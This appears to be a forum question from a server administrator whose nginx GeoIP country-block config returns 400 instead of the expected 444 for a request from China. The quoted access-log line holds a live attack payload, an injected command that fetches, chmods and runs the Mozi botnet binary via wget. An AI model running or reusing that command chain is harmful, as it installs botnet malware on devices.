I am trying to implement, on a nginx webserver, a country block with a map.
This is my server configuration:
include snippets/ban-country-codes.conf;
include snippets/ban-user-agent.conf;
server {
listen 80 default_server;
server_name _;
# Disallow access based on GeoIP
if ($allowed_country = no) {
return 444;
}
# Disallow access based on user agent
if ($allowed_useragent = no) {
return 444;
}
access_log /var/log/nginx/dehydrated80.access.log combinedplusgeoip;
error_log /var/log/nginx/dehydrated80.error.log;
location ^~ /.well-known/acme-challenge {
default_type "text/plain";
auth_basic "off";
alias /var/www/dehydrated;
}
#redirect all other urls to https
location / {
return 301 https://$host$request_uri;
}
}
and this is the snippet that implements the ban (snippets/ban-country-codes.conf):
map $geoip_country_code3 $allowed_country {
'' no;
CHN no;
default yes;
}
In theory nginx should return 444 (close the connection) for clients from CHN and clients with no geo identification.
Unfortunately i see this in my log (custom format combinedplusgeoip, a combined format in which i added the geoip information):
<ipaddress> CHN - - [14/Oct/2020:11:02:37 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 166 "-" "-"
The server responds with a 400 (of course, it's a malicious request) instead with an expected 444.
How is it possible?
